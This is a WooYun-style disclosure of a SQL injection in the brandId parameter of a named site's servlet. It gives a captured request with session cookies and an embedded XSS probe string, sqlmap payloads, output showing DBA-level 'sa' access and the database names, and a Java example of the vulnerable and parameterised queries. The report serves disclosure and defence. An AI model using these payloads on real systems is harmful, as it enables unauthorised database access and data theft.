WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --------http://drop.zone.ci/
2015-12-10: Actively contacting the vendor and waiting for the vendor to claim the report; details are not publicly disclosed.
2016-01-23: The vendor has actively ignored the vulnerability; details are disclosed to the public.
As titled.
www.xiaoyuan52.com
GET /ServiceProductDetailServlet?aid=234&brandId= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.xiaoyuan52.com/
Cookie: JSESSIONID=A0BB8836496506E48280E2FD1FF9A6FB; Hm_lvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lpvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1449569305,1449569323,1449569337,1449569460; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1449569460; __utma=46112941.752146213.1449568247.1449568247.1449568247.1; __utmb=46112941.4.10.1449568247; __utmc=46112941; __utmz=46112941.1449568247.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_1007db9ceeef283a9034565ae4ded9ea=1449568780,1449568809,1449569056,1449569545; Hm_lpvt_1007db9ceeef283a9034565ae4ded9ea=1449569545; __c_sesslist_45193=e9tugjszlg_cy1; __c_pv_45193=6; __c_session_45193=1449568247477812; __c_today_45193=1; __c_review_45193=0; __c_last_45193=1449568247477; __c_visitor=1449568247477812; __c_session_at_45193=1449569463396; HMACCOUNT=73DDED9F0E84E15A; __cs_visitor=1449568247477812; __cs_skey=43cbwd; cokShengId=cb824cad61d045f0a038f4d96100c6b1; cokShiId=df1ede907d8b4753bfe3dd5150e0d63f; cokSchoolId=1773; Hm_lvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lpvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lpvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lvt_3be674bc521868af0b6a4f4abe42f5e1=1449569247,1449569275; Hm_lpvt_3be674bc521868af0b6a4f4abe42f5e1=1449569275; __utmv=; opcid=1449569277183_1253895130; opsid=1449569277183_1095337246; oppt=oneplus; opsct=1449569277184; opbct=1449569277184; opnt=1449569277184; opstep=1; optime_browser=1449569277183; opstep_event=0; opnt_event=1449569277184; Hm_lvt_927e53b3ef9848d0b2b347b67f64cd59=1449569324,1449569330,1449569460; Hm_lpvt_927e53b3ef9848d0b2b347b67f64cd59=1449569460; __utmt=1; BAIDUID=B6FA785FD29ADA1C8E56E87A07518F28:FG=1
Host: www.xiaoyuan52.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The brandId parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: brandId (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: aid=234&brandId=-8286' OR 8471=8471 AND 'yVwZ'='yVwZ

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: aid=234&brandId=-1' OR 4578=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mzvK'='mzvK
---
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current database: 'P2Psite'
current user is DBA: True
available databases [8]:
[*] master
[*] model
[*] msdb
[*] p2p
[*] P2Psite
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
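As an added illustration (not code from the report or from the vendor's site), the servlet-side pattern that produces this class of bug, beside a hardened version that binds brandId as a parameter. The parameter names aid and brandId come from the request above; the class, table and column names are assumptions.

```java
import java.sql.*;
import java.util.ArrayList;
import java.util.List;

public class ServiceProductLookup {
    // Vulnerable shape: brandId is spliced into the SQL text, so a value such as
    //   -8286' OR 8471=8471 AND 'yVwZ'='yVwZ
    // rewrites the WHERE clause. Table and column names are assumptions.
    static List<Integer> findProductsVulnerable(Connection conn, String aid, String brandId)
            throws SQLException {
        String sql = "SELECT id FROM ServiceProduct WHERE aid = " + aid
                   + " AND brandId = '" + brandId + "'";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return collectIds(rs);
        }
    }

    // Hardened shape: the SQL text is fixed and both values are bound parameters,
    // so quotes and keywords inside brandId are data, never part of the query.
    static List<Integer> findProductsSafe(Connection conn, String aid, String brandId)
            throws SQLException {
        int aidValue = Integer.parseInt(aid);   // aid is numeric in the captured request;
                                                // a non-number fails here, before any SQL
        // The captured request sends brandId= (empty): treat that as "no brand filter".
        boolean hasBrand = brandId != null && !brandId.isEmpty();
        String sql = hasBrand
            ? "SELECT id FROM ServiceProduct WHERE aid = ? AND brandId = ?"
            : "SELECT id FROM ServiceProduct WHERE aid = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, aidValue);
            if (hasBrand) {
                ps.setString(2, brandId);
            }
            try (ResultSet rs = ps.executeQuery()) {
                return collectIds(rs);
            }
        }
    }

    private static List<Integer> collectIds(ResultSet rs) throws SQLException {
        List<Integer> ids = new ArrayList<>();
        while (rs.next()) {
            ids.add(rs.getInt("id"));
        }
        return ids;
    }
}
```

The sqlmap output also shows the application connecting as sa with DBA rights; the parameterised query removes the injection, and running the servlet's connection pool as a low-privilege database login limits what any remaining bug can reach.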
Unable to contact the vendor, or the vendor actively declined.